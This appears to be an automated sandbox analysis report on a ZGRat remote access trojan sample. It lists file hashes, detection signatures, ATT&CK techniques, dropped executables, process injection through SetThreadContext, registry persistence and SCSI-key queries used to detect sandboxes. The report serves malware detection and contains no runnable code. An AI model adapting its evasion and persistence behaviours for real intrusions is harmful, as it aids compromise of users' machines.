zgrat | fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f

Resubmissions

27-03-2024 14:29

240327-rt28vaea88 10

30-11-2023 18:35

231130-w8tx8sga7y 10

30-11-2023 17:17

231130-vtpvaseh7t 10

Analysis

max time kernel
1811s
max time network
1824s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
27-03-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe
Size

1.3MB
MD5

fc1970b497075ee27039eebaca37c4b2
SHA1

f443d152d319c3d0934bf51ff21331f2a95af87c
SHA256

fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f
SHA512

3e9add4e211706a655e899d9a8163d3c67e49202ada75619708bca76d32d07dc36529ab151fca43aeef84a841e55a874b137c8d6945dd65472a872df6a36eb79
SSDEEP

24576:7Zts+9k0OExFJH09tGqR9aNbL+Ko5aa7Ci0XpURy+VjAj7F3EBc:QugGqDaNbL+KRGCeRxAj7B

Score

10^/10

zgrat persistence rat

Malware Config

Signatures

Detect ZGRat V1 16 IoCs

resource	yara_rule
behavioral1/memory/4312-23-0x00000190EDA30000-0x00000190EDB30000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-232-0x00000252AC990000-0x00000252ACA74000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-242-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-241-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-251-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-255-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-267-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-271-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-279-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-283-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-287-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-291-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-275-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-263-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-259-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1
behavioral1/memory/5640-247-0x00000252AC990000-0x00000252ACA6F000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 25 IoCs

flow	pid	Process
118	3176	powershell.exe
123	4608	powershell.exe
127	1924	powershell.exe
133	4268	powershell.exe
144	3912	powershell.exe
147	1548	powershell.exe
149	4256	powershell.exe
152	6028	powershell.exe
158	984	powershell.exe
162	5200	powershell.exe
180	3396	powershell.exe
183	4948	powershell.exe
186	3016	powershell.exe
189	3956	powershell.exe
194	1256	powershell.exe
197	2272	powershell.exe
217	1752	powershell.exe
221	5864	powershell.exe
228	2268	powershell.exe
232	1584	powershell.exe
237	5464	powershell.exe
242	1120	powershell.exe
244	5360	powershell.exe
262	5156	powershell.exe
274	4340	powershell.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 31 IoCs

pid	Process
3396	Hyhueiwl.exe
4132	Source.exe
652	Source.exe
1440	Yabai.exe
5696	Hyhueiwl.exe
5772	Hyhueiwl.exe
5640	Yabai.exe
4268	Source.exe
1368	Source.exe
1440	Source.exe
5616	Source.exe
5992	Source.exe
2260	Source.exe
3504	Source.exe
5180	Source.exe
4028	Source.exe
1820	Source.exe
2044	Source.exe
3788	Source.exe
6000	Source.exe
3524	Source.exe
5720	Source.exe
4972	Source.exe
1644	Source.exe
5556	Source.exe
3628	Source.exe
6112	Source.exe
1576	Source.exe
4004	Source.exe
5384	Source.exe
3884	Source.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Suspicious use of SetThreadContext 20 IoCs

description	pid	Process	procid_target
PID 1120 set thread context of 4312	1120	fd387cb5e59d395071f7db3b3ff55c4e41fb3deede556f974eb14336e48d6d3f.exe	94
PID 4132 set thread context of 652	4132	Source.exe	126
PID 652 set thread context of 1372	652	Source.exe	127
PID 1372 set thread context of 5196	1372	RegSvcs.exe	128
PID 3396 set thread context of 5772	3396	Hyhueiwl.exe	135
PID 1440 set thread context of 5640	1440	Yabai.exe	136
PID 4268 set thread context of 1368	4268	Source.exe	143
PID 1368 set thread context of 3304	1368	Source.exe	146
PID 3304 set thread context of 5764	3304	MSBuild.exe	151
PID 1440 set thread context of 5616	1440	Source.exe	167
PID 5992 set thread context of 2260	5992	Source.exe	208
PID 3504 set thread context of 5180	3504	Source.exe	222
PID 4028 set thread context of 1820	4028	Source.exe	259
PID 2044 set thread context of 3788	2044	Source.exe	300
PID 6000 set thread context of 3524	6000	Source.exe	303
PID 5720 set thread context of 4972	5720	Source.exe	353
PID 1644 set thread context of 5556	1644	Source.exe	389
PID 3628 set thread context of 6112	3628	Source.exe	406
PID 1576 set thread context of 4004	1576	Source.exe	445
PID 5384 set thread context of 3884	5384	Source.exe	460

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 58 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchHost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchHost.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	SearchHost.exe

Modifies registry class 58 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-647252928-2816094679-1307623958-1000\{652332C7-015B-4188-94FB-3967D3D46241}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c200602000400280010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a0000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000